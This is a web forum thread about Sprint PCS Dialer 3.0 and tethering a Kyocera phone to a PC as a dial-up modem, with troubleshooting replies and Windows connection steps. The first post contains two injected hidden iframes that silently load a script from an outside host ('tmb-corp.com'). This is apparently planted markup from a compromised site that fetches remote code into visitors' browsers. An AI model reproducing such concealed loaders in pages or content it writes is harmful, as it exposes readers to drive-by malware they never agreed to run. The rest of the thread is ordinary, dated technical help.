+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Wink New Version of Dialer

SPCS has quietly released a new version of dialer (3.0). I say "quietly" because data support was shocked when I called with a question.

Some nice features - it does have 3G support. Now all we need are devices and networks! It is available to download in the normal spot in your SPCS account screen.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Dialer

This may be a dumb question...

"What is Dialer used for?"

Among other things, Dialer is software (that runs on your PC) that allows you to attach your phone to your computer. Your phone can then act as a wireless modem - giving you Internet or RAS access on your PC. You need to have the phone in the cradle, or use the Sprint ($59) or Samsung ($49)data cable.

But you can do that without dialer, does it allow you to use the sprint isp instead of your own?

Administrator

Arrow

Originally posted by Justin
    But you can do that without dialer, does it allow you to use the sprint isp instead of your own?
    in a sense.. yes. when you connect your laptop ro whatever thru the phone.. you will use the sprints isp to get into the 'net.

Stupid question ^^; Please help!

Gee... i've actually never used the dialer software before...

Still, how do you get the Dialer 3.0 software to talk to your phone? I've turned off the HotSync manager, and i'm able to talk directly to the phone with AT commands on the serial port, but when I bring up Dialer, the "Device Info" section says no device avaliable no matter how many times i refresh it.

Anyone else have problems?

Thanks to anyone who replies!

Administrator

Arrow

moo..

you have to set up a new device in the device manager screen on your pc , and name it "PCS Dialer". then you just set it up as you would a new modem.. which is bascially what the dialer is making your pcs phone to be...

Thanks Marctronixx!

Thanks Marctronixx!

I wouldn't have thought about that on my own. Got my computer to talk happily to my phone via the serial port.

Now i'm wondering if it would be possible to establish a connection over an infared connection

If i remember correctly, Infared ports in Win98 used to look like serial ports... Windows 2000 handles them in a totally different manner though..

Administrator

Arrow

no such luck on the IR port... it is hardwired to the palm side and the phone section does not see it that way...

Where can I download this dialer? And am I correct in saying I can use the cradle to use a laptop with the dialer?

Administrator

Arrow

yes!

its on your sprint pcs start start page.

where you see the "blazer browser 2.0 now available" click on that and a new screen will pop up. then select your platform in the left habd box (min 98/nt/ etc..) then on the right select box it will show several items you can download.. you will see the dialer 3.0 there...

This may be a silly question, but when you do this, are you using your plans minutes?

Craig

Does anyone know if the dialer software will work w/an AirTouch 510 Data Card? Is the card 3G compatible?
    Carl

air card 510

the dialer will only work with the sprint phones, as for the air card it doesn't currently work at all.

Jeff:
    thanks, I tested the dialer 3.0 w/my aircard 510. It did not work, however, it works fun if I just addresses directly as a modem device in DUN. I am running w2k.
    Carl

Administrator

Arrow

Originally posted by csherman
    This may be a silly question, but when you do this, are you using your plans minutes?

Craig
    yes!

the air card is not 3g compatibile...

Originally posted by Marctronixx
    moo..

you have to set up a new device in the device manager screen on your pc , and name it "PCS Dialer". then you just set it up as you would a new modem.. which is bascially what the dialer is making your pcs phone to be...
    What device type do you use? standard 14.4? I can't find dial 3.0 anywhere on the web pages
    Thanx,
    Rich

Administrator

Arrow

Setup: First, exit the Hotsync manager, or anything else that's using the serial port.

Go to Control Panel, "Phone and modem options", and Add a new modem on COM1 (or whatever port you have the serial cable to the I300 on). Dont do the auto detect option, just name it "i300 modem".Set the max port speed to 19200.

Now, in "network and dialup connections", select "make new connection". The right choices on succeeding pages are: "Dialup to the internet", "set up internet connection manually", "connect through a phone line and modem", select the I300 modem, Phone number #2932 (do NOT check "use area code and dialing rules" here). Username and password are both "web" . Set any connection name you like and exit the wizard.

Now go back to Control Panel, Network and dialup connections. Select the new "connection", right-click, and click "Properties". Under the connection properties, go to the "security" tab, and make sure "run script" is not checked. (No, I don't know what it does with the username and password, but they seem to have to be there.) Go to the "networking" tab, and be sure the only "component" enabled to use the connection is "internet protocol (tcp/ip)". While still on that tab, highlight "internet protocol (tcp/ip), click "Properties", and make sure "obtain an IP address automatically" and "obtain DNS server address automatically" are both set.

"ok" out of everything.

On the phone side: It does not matter what the "Connection" under "Prefs" is set to. You do however need to be running the "Data/fax" app in the phone. Under Options, Settings, for that app, set the speed to 19200 (or whatever you told the PC to use for the port). Flow control should be Hardware.

With the "Data/fax" app running in the phone, go back to the laptop and dial your new "connection". It will connect in about five seconds, report a speed of 19.2kbps (it's really 14.4k), and you're on the Net.

This is what i did with the kyo 6035 to my old laptop. i have not done it with the i300,. but they are the same. the dialer software WAS in the webpage under your downloads, but i dont know where they have moved it since they updated their screen...

Thumbs up

Thank you for the quick and detailed reply!

Exclamation Using I300 as modem

Hello,
    I've had the I300 for 3 days and have not been able to get it to run as a modem.
    I think I've tried what is suggested in the thread.
    I have Sprint Dialer, bluekite and blazer 2.0
    I've entered a modem in control panel but can't get it to dial
    -It does seem to be communicating somewhat with the I300 as the display on the phone changes to ***Data** when I do a query.
    I'm trying to accomplish getting my outlook e-mail while traveling, and without having to find a phone with a jack.

Can anyone outline the best way to do this?
    Thanks
    Paul- a newbie-- this site is great!